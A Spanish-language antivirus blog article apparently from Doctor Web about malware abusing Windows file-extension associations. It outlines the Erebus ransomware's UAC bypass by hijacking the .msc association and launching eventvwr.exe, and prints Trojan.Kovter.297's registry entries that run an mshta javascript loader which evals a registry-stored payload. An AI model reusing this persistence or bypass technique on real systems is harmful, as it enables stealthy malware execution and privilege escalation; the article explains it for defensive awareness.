¡Vd. usa un navegador obsoleto!

Es posible que la página no se visualice correctamente.

Aguafiestas

Незваные гости

Otras ediciones de este tema (76)
  • añadir a favoritos
    Añadir a marcadores

Sobre las extensiones – más información

Consultas: 639 Comentarios: 2 Ranking: 9

miércoles 4 de octubre de 2017

En la edición «Tres letras después de un punto» hemos informado sobre cómo los malintencionados usan las extensiones de archivos para engañar a usuarios. Pero no hemos mencionados todas las posibilidades de extensiones usadas por los delincuentes.

Como ya hemos informado, el sistema operativo asocia una extensión con determinadas acciones que se realizarán si el usuario hace clic sobre un archivo. Por ejemplo, en caso de un archivo con extensión png, es muy probable que se inicie un programa para visualizar o editar los archivos gráficos. Pero ¿qué pasara si hacemos clic sobre un archivo con extensión .torrent?

Program.MediaGet instala a si mismo como cliente torrent de manera predeterminada, al cambiar las asociaciones de archivos .torrent en el registro.

Program.Zona comprueba la configuración de asociaciones con los archivos .torrent y, si Zona no es un software predeterminado para abrir los archivos torrent, ofrece asociar a sí mismo son ellos.

Es decir, al hacer clic sobre el enlace, Vd. Iniciará un programa nocivo. Además, es muy probable que Vd. también confirme el inicio de la aplicación pensaba que se inicia el cliente torrent.

El sistema de control de inicio Windows, por supuesto, visualizará qué se inicia en realidad, pero, al usar las extensiones, los delincuentes también pueden esquivarlo.

El método de esquivar UAC consiste en lo siguiente.

  1. Erebus se copia a sí mismo a la carpeta de sistema como un archivo con nombre aleatorio y luego hace cambios en el registro Windows para suplantar la asociación para la extensión de archivos .msc y ejecutar el archivo recién creado con nombre aleatorio.
  2. Luego Erebus ejecuta el archivo eventvwr.exe (Ver eventos), que automáticamente abre el archivo eventvwr.msc.
  3. Como el archivo msc ya no está vinculado a mmc.exe (Consola de administración), eventvwr.exe iniciará el archivo de extorsionista. La consulta de eventos funciona en modo de permisos avanzados, por lo tanto, el archivo ejecutable tendrá los mismos privilegios, lo que ayudará a esquivar UAC.

https://twitter.com/malwrhunterteam/status/828957753121112064

Lo que pasa es que algunos programas de sistema se inician enseguida con permisos avanzados, y los archivos nocivos se inician en vez de los mismos, o como sus extensiones.

¿Cómo se realiza una asociación? Bastante fácil. Por ejemplo, Trojan.Kovter.297 sin cuerpo registra para sí mismo los archivos con extensión necesarias y los usa como triggers para ser iniciado.

SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\.2c1a69e" Value="" Type=1 Data=bf1570\0

SET "#reg_any" Key="\REGISTRY\USER\S-1-5-21-2963211352-318565981-831850675-1001_CLASSES\bf1570\shell\open\command" Value="" Type=1 Data=mshta "javascript:qZ7sOhCI8q="EHHH";n7x=new

ActiveXObject("WScript.Shell");DsJb4wGJs4="BtEe";j1ZSp8=n7x.RegRead("HKCU\\software\\isidaqnf\\amqoasyj");k7pfpsNfb="1beAz2j";eval(j1ZSp8);EHJ71gfGFX="2OxujZ1jpC";"

La cosa menos nociva que pueden hacer los creadores de virus con las extensiones son las asociaciones de los archivos creados por el programa nocivo para notificar a las víctimas sobre la necesidad de pagar un rescate.

Trojan.Encoder.12950 ubica en el sistema un script que visualizará mensajes con requerimientos y lo indica en la asociación para la extensión *.dcry.

#Windows #software_nocivo

El mundo de antivirus recomienda

  1. El Sistema de control de inicio de Windows visualiza las solicitudes de inicio de cualquier aplicación. Por lo tanto, debe siempre estar activado.
  2. Consulte atentamente los mensajes del Sistema de control de inicio, para entender qué archive intenta iniciarse.
  3. Use el antivirus, solo el mismo podrá supervisar todo lo nocivo inventado por los malintencionados.

[Twitter]

Nos importa su opinión

Para redactar un comentario, debe iniciar sesión para entrar en su cuenta del sitio web Doctor Web. - Si aún no tiene la cuenta, puede crearla.

Comentarios de usuarios

Comentarios a otras ediciones | Mis comentarios